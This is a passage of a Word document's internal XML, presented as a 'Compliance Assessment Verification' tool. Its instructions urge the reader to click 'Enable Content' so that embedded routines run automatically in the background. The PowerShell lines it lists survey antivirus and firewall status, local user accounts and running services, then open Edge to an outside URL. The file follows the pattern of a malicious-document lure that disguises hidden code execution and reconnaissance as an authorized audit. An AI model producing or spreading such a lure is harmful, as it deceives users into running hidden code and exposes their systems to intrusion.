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>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>COMPLIANCE ASSESSMENT VERIFICATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>PowerShell Execution &amp; Automated System Compliance Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>PURPOSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This document is a technical compliance assessment tool that demonstrates automated system configuration collection and validation. When content is enabled, the embedded framework executes compliance verification routines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>POWERSHELL EXECUTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The compliance tool executes the following PowerShell routines for automated assessment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Get-ComputerInfo | Select-Object WindowsVersion, OsHardwareAbstractionLayer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Get-MpComputerStatus | Select-Object AntivirusEnabled, RealTimeProtectionEnabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Get-NetFirewallProfile | Select-Object Name, Enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Get-LocalUser | Select-Object Name, Enabled, LastLogon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Get-Service | Where-Object { $_.Status -eq "Running" } | Select-Object Name, DisplayName</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Start-Process "msedge.exe" "https://compliance-assessment.verification"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>COMPLIANCE FRAMEWORKS VERIFIED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>HIPAA Security Rule - Health data protection and privacy controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SOC 2 Type II - Service organization security controls effectiveness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ISO 27001 - Information Security Management System requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>SYSTEM REQUIREMENTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Microsoft Word 2016+ (Recommended). PowerShell 5.1+. Windows 10/11 or Windows Server 2019+. Microsoft Edge browser installed for verification dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>HOW TO USE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Open this document in Microsoft Word (not a web browser).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2. Click "Enable Content" on the security warning bar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3. The embedded compliance assessment will execute automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4. System configuration collection begins in the background.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>5. Microsoft Edge opens with the verification dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:color w:val="888888"/>
        </w:rPr>
        <w:t>Compliance Assessment Framework v1.0 - Authorized Security Tool</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/settings.xml><?xml version="1.0" encoding="utf-8"?>
<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:defaultTabStop w:val="720"/>
  <w:zoom w:percent="100"/>
</w:settings>
</file>

<file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:style w:type="paragraph" w:styleId="Normal">
    <w:name w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="56"/>
      <w:color w:val="1F4E79"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
      <w:color w:val="2E75B6"/>
    </w:rPr>
  </w:style>
</w:styles>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/officeDocument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</Relationships>
</file>